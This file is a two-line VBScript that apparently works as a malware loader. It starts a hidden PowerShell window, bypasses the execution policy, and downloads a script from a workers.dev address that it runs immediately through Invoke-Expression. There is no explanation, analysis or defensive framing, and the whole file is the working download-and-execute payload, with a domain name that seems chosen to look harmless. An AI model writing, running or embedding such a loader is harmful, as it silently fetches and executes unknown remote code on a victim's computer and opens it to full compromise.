Set sh = CreateObject("WScript.Shell")
sh.Run "powershell -ExecutionPolicy Bypass -c ""irm https://search.defenders.workers.dev/p/1 | iex""", 0, False
